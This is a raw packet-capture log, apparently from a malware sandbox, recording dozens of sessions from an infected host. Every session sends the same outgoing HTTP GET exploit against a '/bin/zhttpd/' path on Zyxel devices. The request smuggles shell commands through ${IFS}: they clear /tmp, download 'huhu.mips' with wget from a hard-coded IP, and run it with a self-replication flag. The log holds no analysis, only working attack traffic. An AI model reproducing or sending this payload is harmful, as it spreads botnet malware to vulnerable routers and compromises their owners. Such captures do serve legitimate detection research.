                                              Jan 29, 2024 07:04:04.295480967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7864192.168.2.1449694143.223.227.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295526028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7865192.168.2.1435368193.173.230.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295556068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7866192.168.2.1451906121.226.202.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295593977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7867192.168.2.143503867.46.61.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295644999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7868192.168.2.1438918209.226.249.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295684099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7869192.168.2.1437842122.93.62.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295721054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7870192.168.2.145693289.176.95.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295780897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7871192.168.2.144840897.110.248.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295814037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7872192.168.2.1458814209.125.117.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295854092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7873192.168.2.1457222132.181.104.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295897961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7874192.168.2.144877893.57.190.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295934916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7875192.168.2.1436892151.53.8.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.295973063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7876192.168.2.145535042.66.25.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296006918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7877192.168.2.146098850.30.209.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296061993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7878192.168.2.1443878112.60.26.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296107054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7879192.168.2.14482828.227.108.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296135902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7880192.168.2.1456270110.236.253.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296160936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7881192.168.2.1436322142.50.21.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296204090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7882192.168.2.1441456205.76.196.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296227932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7883192.168.2.144566436.239.97.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296277046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7884192.168.2.1452810196.63.108.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296313047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7885192.168.2.1454250109.211.131.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296350956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7886192.168.2.1441628101.137.152.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296397924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7887192.168.2.1440362174.227.12.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296397924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7888192.168.2.1445486105.38.80.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296432018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7889192.168.2.1456192104.156.223.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296456099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7890192.168.2.1456268193.114.91.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296514988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7891192.168.2.145001414.208.113.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296531916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7892192.168.2.145823893.98.187.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296585083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7893192.168.2.1435686206.227.177.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296638012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7894192.168.2.1443850128.210.100.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296659946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7895192.168.2.1449328210.150.145.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296686888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7896192.168.2.1436734148.225.130.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296751976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7897192.168.2.1436858133.239.133.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296793938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7898192.168.2.14505045.144.23.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296860933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7899192.168.2.145848063.37.31.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296890020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7900192.168.2.145811881.114.96.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296921968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7901192.168.2.145034876.135.204.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.296972990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7902192.168.2.144143823.149.199.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297008991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7903192.168.2.1457104195.240.132.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297055960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7904192.168.2.144454657.145.147.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297075987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7905192.168.2.1445234217.118.175.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297108889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7906192.168.2.1435810192.55.88.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297139883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7907192.168.2.1457518143.1.88.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297172070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7908192.168.2.1460686116.49.133.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297202110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7909192.168.2.1447028213.152.183.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297238111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7910192.168.2.1437720113.108.150.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297271967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7911192.168.2.143940691.112.171.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297293901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7912192.168.2.1453758159.89.212.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297338009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7913192.168.2.1440658199.188.179.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297391891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7914192.168.2.1434100128.13.177.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297415018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7915192.168.2.1450924151.168.227.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297480106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7916192.168.2.1446568217.234.102.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297488928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7917192.168.2.145087669.179.179.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297507048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7918192.168.2.145218691.109.77.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297559977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7919192.168.2.144838425.152.44.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297594070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7920192.168.2.1434722107.144.211.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297624111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7921192.168.2.143317299.85.53.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297663927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7922192.168.2.145811260.148.80.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297688007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7923192.168.2.144842078.60.237.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297748089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7924192.168.2.143585060.15.77.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297806978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7925192.168.2.1445136209.8.80.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297846079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7926192.168.2.1446798222.39.95.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.297880888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7927192.168.2.1439974119.239.141.41443
                                              TimestampBytes transferredDirectionData
